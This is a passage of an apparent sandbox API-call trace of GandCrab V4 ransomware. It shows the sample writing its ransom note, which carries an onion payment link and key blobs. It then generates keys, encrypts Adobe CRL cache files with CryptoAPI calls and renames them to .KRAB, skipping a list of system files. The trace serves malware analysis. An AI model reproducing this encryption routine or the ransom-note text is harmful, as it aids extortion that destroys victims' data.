param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache\\\\KRAB-DECRYPT.txt") returned 90 [0056.499] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\adobe\\acrobat\\dc\\security\\crlcache\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x45c [0056.502] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0056.502] WriteFile (in: hFile=0x45c, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338e320, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338e320*=0x1f6e, lpOverlapped=0x0) returned 1 [0056.502] CloseHandle (hObject=0x45c) returned 1 [0056.503] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.503] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0056.503] GetSystemTime (in: lpSystemTime=0x3030400 | out: lpSystemTime=0x3030400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x3, wMilliseconds=0x2be)) [0056.503] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x35f0000 [0056.504] GetWindowsDirectoryW (in: lpBuffer=0x35f0000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0056.504] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x35f0200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x35f0600, lpMaximumComponentLength=0x35f0608, lpFileSystemFlags=0x35f0604, lpFileSystemNameBuffer=0x35f0400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x35f0600*=0xd2ca4def, lpMaximumComponentLength=0x35f0608*=0xff, lpFileSystemFlags=0x35f0604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0056.504] wsprintfW (in: param_1=0x3030000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache\\d2ca4a08d2ca4dee3d.lock") returned 96 [0056.504] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\adobe\\acrobat\\dc\\security\\crlcache\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x45c [0056.505] VirtualFree (lpAddress=0x35f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.505] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.505] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache\\") returned 73 [0056.505] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache\\*" [0056.505] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache\\*", lpFindFileData=0x338e350 | out: lpFindFileData=0x338e350) returned 0xfbd260 [0056.506] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0056.506] FindNextFileW (in: hFindFile=0xfbd260, lpFindFileData=0x338e350 | out: lpFindFileData=0x338e350) returned 1 [0056.506] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0056.506] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0056.506] FindNextFileW (in: hFindFile=0xfbd260, lpFindFileData=0x338e350 | out: lpFindFileData=0x338e350) returned 1 [0056.506] lstrcmpW (lpString1="0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl", lpString2=".") returned 1 [0056.506] lstrcmpW (lpString1="0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl", lpString2="..") returned 1 [0056.506] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache\\", lpString2="0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache\\0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache\\0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl" [0056.506] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0056.506] wsprintfW (in: param_1=0x3030000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache\\0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl.KRAB") returned 122 [0056.506] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache\\0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl") returned 117 [0056.506] lstrlenW (lpString=".crl") returned 4 [0056.506] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x35f0000 [0056.507] wsprintfW (in: param_1=0x35f0000, param_2="%s " | out: param_1=".crl ") returned 5 [0056.507] VirtualFree (lpAddress=0x35f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.507] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache\\0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl") returned 117 [0056.507] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache\\0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl") returned 117 [0056.507] lstrcmpiW (lpString1="0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl", lpString2="desktop.ini") returned -1 [0056.507] lstrcmpiW (lpString1="0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl", lpString2="autorun.inf") returned -1 [0056.507] lstrcmpiW (lpString1="0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl", lpString2="ntuser.dat") returned -1 [0056.507] lstrcmpiW (lpString1="0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl", lpString2="iconcache.db") returned -1 [0056.507] lstrcmpiW (lpString1="0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl", lpString2="bootsect.bak") returned -1 [0056.507] lstrcmpiW (lpString1="0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl", lpString2="boot.ini") returned -1 [0056.507] lstrcmpiW (lpString1="0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl", lpString2="ntuser.dat.log") returned -1 [0056.507] lstrcmpiW (lpString1="0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl", lpString2="thumbs.db") returned -1 [0056.507] lstrcmpiW (lpString1="0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl", lpString2="KRAB-DECRYPT.html") returned -1 [0056.507] lstrcmpiW (lpString1="0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl", lpString2="KRAB-DECRYPT.txt") returned -1 [0056.507] lstrcmpiW (lpString1="0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl", lpString2="CRAB-DECRYPT.txt") returned -1 [0056.507] lstrcmpiW (lpString1="0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl", lpString2="ntldr") returned -1 [0056.507] lstrcmpiW (lpString1="0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl", lpString2="NTDETECT.COM") returned -1 [0056.507] lstrcmpiW (lpString1="0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl", lpString2="Bootfont.bin") returned -1 [0056.508] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x35f0000 [0056.508] CryptAcquireContextW (in: phProv=0x338e234, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e234*=0xfbca08) returned 1 [0056.508] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3600000 [0056.509] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0056.509] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0056.509] CryptGenRandom (in: hProv=0xfbca08, dwLen=0x20, pbBuffer=0x338e2cc | out: pbBuffer=0x338e2cc) returned 1 [0056.509] CryptReleaseContext (hProv=0xfbca08, dwFlags=0x0) returned 1 [0056.509] VirtualFree (lpAddress=0x3600000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.509] CryptAcquireContextW (in: phProv=0x338e234, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e234*=0xfbca08) returned 1 [0056.510] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3600000 [0056.510] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0056.510] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0056.510] CryptGenRandom (in: hProv=0xfbca08, dwLen=0x8, pbBuffer=0x338e2ec | out: pbBuffer=0x338e2ec) returned 1 [0056.510] CryptReleaseContext (hProv=0xfbca08, dwFlags=0x0) returned 1 [0056.510] VirtualFree (lpAddress=0x3600000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.511] CryptAcquireContextW (in: phProv=0x338e22c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e22c*=0xfbca08) returned 1 [0056.512] CryptImportKey (in: hProv=0xfbca08, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e230 | out: phKey=0x338e230*=0xfbd4e0) returned 1 [0056.512] CryptGetKeyParam (in: hKey=0xfbd4e0, dwParam=0x8, pbData=0x338e224, pdwDataLen=0x338e228, dwFlags=0x0 | out: pbData=0x338e224*=0x800, pdwDataLen=0x338e228*=0x4) returned 1 [0056.512] CryptEncrypt (in: hKey=0xfbd4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x35f0000*, pdwDataLen=0x338e25c*=0xc8, dwBufLen=0x100 | out: pbData=0x35f0000*, pdwDataLen=0x338e25c*=0x100) returned 1 [0056.512] GetLastError () returned 0x0 [0056.512] CryptDestroyKey (hKey=0xfbd4e0) returned 1 [0056.512] CryptReleaseContext (hProv=0xfbca08, dwFlags=0x0) returned 1 [0056.512] CryptAcquireContextW (in: phProv=0x338e22c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e22c*=0xfbca08) returned 1 [0056.513] CryptImportKey (in: hProv=0xfbca08, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e230 | out: phKey=0x338e230*=0xfbd6e0) returned 1 [0056.513] CryptGetKeyParam (in: hKey=0xfbd6e0, dwParam=0x8, pbData=0x338e224, pdwDataLen=0x338e228, dwFlags=0x0 | out: pbData=0x338e224*=0x800, pdwDataLen=0x338e228*=0x4) returned 1 [0056.513] CryptEncrypt (in: hKey=0xfbd6e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x35f0100*, pdwDataLen=0x338e25c*=0xc8, dwBufLen=0x100 | out: pbData=0x35f0100*, pdwDataLen=0x338e25c*=0x100) returned 1 [0056.513] GetLastError () returned 0x0 [0056.513] CryptDestroyKey (hKey=0xfbd6e0) returned 1 [0056.513] CryptReleaseContext (hProv=0xfbca08, dwFlags=0x0) returned 1 [0056.513] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache\\0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\adobe\\acrobat\\dc\\security\\crlcache\\0fded5ceb68c302b1cdb2bddd9d0000e76539cb0.crl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x464 [0056.514] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3600000 [0056.514] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0056.514] ReadFile (in: hFile=0x464, lpBuffer=0x3600000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338e2fc, lpOverlapped=0x0 | out: lpBuffer=0x3600000*, lpNumberOfBytesRead=0x338e2fc*=0x27d, lpOverlapped=0x0) returned 1 [0056.559] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0xfffffd83, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0056.559] WriteFile (in: hFile=0x464, lpBuffer=0x3870000*, nNumberOfBytesToWrite=0x27d, lpNumberOfBytesWritten=0x338e2f8, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesWritten=0x338e2f8*=0x27d, lpOverlapped=0x0) returned 1 [0056.559] WriteFile (in: hFile=0x464, lpBuffer=0x35f0000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338e2f8, lpOverlapped=0x0 | out: lpBuffer=0x35f0000*, lpNumberOfBytesWritten=0x338e2f8*=0x208, lpOverlapped=0x0) returned 1 [0056.559] VirtualFree (lpAddress=0x3600000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.563] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.564] CloseHandle (hObject=0x464) returned 1 [0056.564] VirtualFree (lpAddress=0x35f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.565] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache\\0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\adobe\\acrobat\\dc\\security\\crlcache\\0fded5ceb68c302b1cdb2bddd9d0000e76539cb0.crl"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache\\0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\adobe\\acrobat\\dc\\security\\crlcache\\0fded5ceb68c302b1cdb2bddd9d0000e76539cb0.crl.krab")) returned 1 [0056.565] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.566] FindNextFileW (in: hFindFile=0xfbd260, lpFindFileData=0x338e350 | out: lpFindFileData=0x338e350) returned 1 [0056.566] lstrcmpW (lpString1="CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl", lpString2=".") returned 1 [0056.566] lstrcmpW (lpString1="CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl", lpString2="..") returned 1 [0056.566] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache\\", lpString2="CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache\\CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache\\CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl" [0056.566] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0056.566] wsprintfW (in: param_1=0x3030000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache\\CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl.KRAB") returned 122 [0056.566] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache\\CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl") returned 117 [0056.566] lstrlenW (lpString=".crl") returned 4 [0056.566] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x35f0000 [0056.567] wsprintfW (in: param_1=0x35f0000, param_2="%s " | out: param_1=".crl ") returned 5 [0056.567] VirtualFree (lpAddress=0x35f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.567] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache\\CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl") returned 117 [0056.567] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache\\CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl") returned 117 [0056.567] lstrcmpiW (lpString1="CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl", lpString2="desktop.ini") returned -1 [0056.567] lstrcmpiW (lpString1="CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl", lpString2="autorun.inf") returned 1 [0056.567] lstrcmpiW (lpString1="CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl", lpString2="ntuser.dat") returned -1 [0056.567] lstrcmpiW (lpString1="CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl", lpString2="iconcache.db") returned -1 [0056.567] lstrcmpiW (lpString1="CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl", lpString2="bootsect.bak") returned 1 [0056.567] lstrcmpiW (lpString1="CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl", lpString2="boot.ini") returned 1 [0056.567] lstrcmpiW (lpString1="CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl", lpString2="ntuser.dat.log") returned -1 [0056.567] lstrcmpiW (lpString1="CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl", lpString2="thumbs.db") returned -1 [0056.567] lstrcmpiW (lpString1="CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl", lpString2="KRAB-DECRYPT.html") returned -1 [0056.567] lstrcmpiW (lpString1="CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl", lpString2="KRAB-DECRYPT.txt") returned -1 [0056.567] lstrcmpiW (lpString1="CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl", lpString2="CRAB-DECRYPT.txt") returned -1 [0056.567] lstrcmpiW (lpString1="CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl", lpString2="ntldr") returned -1 [0056.567] lstrcmpiW (lpString1="CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl", lpString2="NTDETECT.COM") returned -1 [0056.568] lstrcmpiW (lpString1="CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl", lpString2="Bootfont.bin") returned 1 [0056.568] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x35f0000 [0056.568] CryptAcquireContextW (in: phProv=0x338e234, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e234*=0xfbca08) returned 1 [0056.568] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3600000 [0056.569] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0056.569] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0056.569] CryptGenRandom (in: hProv=0xfbca08, dwLen=0x20, pbBuffer=0x338e2cc | out: pbBuffer=0x338e2cc) returned 1 [0056.569] CryptReleaseContext (hProv=0xfbca08, dwFlags=0x0) returned 1 [0056.569] VirtualFree (lpAddress=0x3600000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.569] CryptAcquireContextW (in: phProv=0x338e234, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e234*=0xfbca08) returned 1 [0056.570] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3600000 [0056.570] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0056.570] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0056.570] CryptGenRandom (in: hProv=0xfbca08, dwLen=0x8, pbBuffer=0x338e2ec | out: pbBuffer=0x338e2ec) returned 1 [0056.570] CryptReleaseContext (hProv=0xfbca08, dwFlags=0x0) returned 1 [0056.571] VirtualFree (lpAddress=0x3600000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.571] CryptAcquireContextW (in: phProv=0x338e22c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e22c*=0xfbca08) returned 1 [0056.571] CryptImportKey (in: hProv=0xfbca08, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e230 | out: phKey=0x338e230*=0xfbd8e0) returned 1 [0056.571] 